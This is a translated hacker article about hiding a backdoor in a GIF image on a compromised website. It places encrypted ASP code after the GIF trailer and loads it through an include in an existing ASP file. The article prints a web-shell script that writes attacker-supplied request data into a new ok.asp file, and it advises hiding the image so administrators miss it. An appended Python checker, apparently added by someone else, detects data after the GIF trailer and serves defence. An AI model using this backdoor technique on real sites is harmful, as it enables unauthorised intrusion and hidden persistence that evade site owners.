Author: smelly beggar! Source: www.bugkidz.org
Getting a WebShell through injection seems to have a fairly high success rate. After getting the shell, you install your own script back door, and it often gets killed. The history of script back doors:

1. At the very beginning, an ASP file was simply placed directly on the site.
2. Then the ASP file was encrypted.
3. Then the script was inserted into existing code. (I often use this.)

But I was found out, and I manually checked the script security of a station. This site was found to be a roam. So I started thinking: how can the back door avoid being found and killed? In the end I studied inserting the script into a picture and then calling the script in the image from an ASP file, which should be possible. The test passed. Now I am writing down what I learned so that everyone can analyze it, make progress together, and improve this method.

During the study I read the structure documentation for GIF pictures. GIF images end at 00 3B. In other words, what comes after 00 3B is not displayed. So we insert the code after 00 3B. Of course, it is better to encrypt the code before putting it in the picture. I wrote a program to do this. It has to be said here that what comes after 00 3B in the picture is not displayed, but the code is still run, and the picture is also displayed normally.

Test: Add: <% = now%> and add: Then you download this image in an ASP file: time. This is normal, because the code in the picture is run as ASP script. In other words, if we write a script that generates a file, we can then submit specific parameters to let the code in the picture generate files. This enables our back door.

1: The way to do this is to find a GIF image on the target site, insert the code into the image, and upload it to the site. This makes it very difficult for an administrator to find the Trojan. One would not think of a Trojan being in a picture.

2: The code we insert is only one line. It is the include file ..... find an ASP file that is a fairly big file. Then we submit to the URL of that ASP to complete the work.
The script I insert into the picture: <% DIM objfso%> <% DIM fdata%> <% DIM objcountfile%> <% on error resume next%> <% set objfso = server.createObject ("scripting.filesystemObject")%> <% fdata = request ("cyfddata")%> <% if fdata <> "" "> <% syfdpath = server.mappath (Request.ServerVariables (" script_name ") &" / ok.asp "%> < % Set objcountfile = objfso.createtextFile (syfdapth, true)%> <% ObjcountFile.write fdata%> <% end if%> <% ObjcountFile.close%> <% set objcountfile = Nothing%> <% set objfso = nothing% >

This code mainly generates an ok.asp file in the current directory. The file content is the data we submitted, read with request ("cyfddata"). This code is encrypted and inserted into the picture. Let's post the code of my program.
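
A defender's check for the technique described above, as an added example (it is not the author's program, which does not appear on this page): it walks the GIF block structure to the real trailer byte and reports any bytes stored after it. The function names and the sample image are constructed for illustration.

```python
# Constructed sample: a minimal 1x1 GIF89a. Its colour table deliberately holds
# the bytes 00 3B, so a naive search for "00 3B" would stop too early.
CLEAN_GIF = bytes.fromhex(
    "474946383961" "01000100800000"      # header, logical screen descriptor
    "003b00ffffff"                       # global colour table (2 entries)
    "21f90401000000" "00"                # graphic control extension
    "2c000000000100010000"               # image descriptor
    "0202440100" "3b")                   # LZW image data, trailer

def _skip_sub_blocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks ending in 0x00."""
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size

def gif_trailing_bytes(data):
    """Return whatever follows the GIF trailer (0x3B), found by parsing blocks."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    flags = data[10]
    pos = 13                                   # header (6) + screen descriptor (7)
    if flags & 0x80:                           # global colour table present
        pos += 3 * (2 << (flags & 0x07))
    while True:
        block = data[pos]
        if block == 0x3B:                      # trailer: the image ends here
            return data[pos + 1:]
        if block == 0x21:                      # extension: label, then sub-blocks
            pos = _skip_sub_blocks(data, pos + 2)
        elif block == 0x2C:                    # image descriptor (10 bytes)
            local_flags = data[pos + 9]
            pos += 10
            if local_flags & 0x80:             # local colour table present
                pos += 3 * (2 << (local_flags & 0x07))
            pos = _skip_sub_blocks(data, pos + 1)  # LZW code size, then data
        else:
            raise ValueError("unexpected block 0x%02x at %d" % (block, pos))

def check_gif(data):
    """Classify an uploaded GIF: clean, trailing-data, script-after-trailer, malformed."""
    try:
        extra = gif_trailing_bytes(data)
    except (ValueError, IndexError):           # bad signature or truncated file
        return "malformed"
    if b"<%" in extra:                         # plain ASP delimiter after the trailer
        return "script-after-trailer"
    return "trailing-data" if extra else "clean"   # encrypted payloads land here
```

Because the article encrypts the inserted code, the presence of any bytes after the trailer is the signal to act on; the `<%` match only catches the unencrypted case.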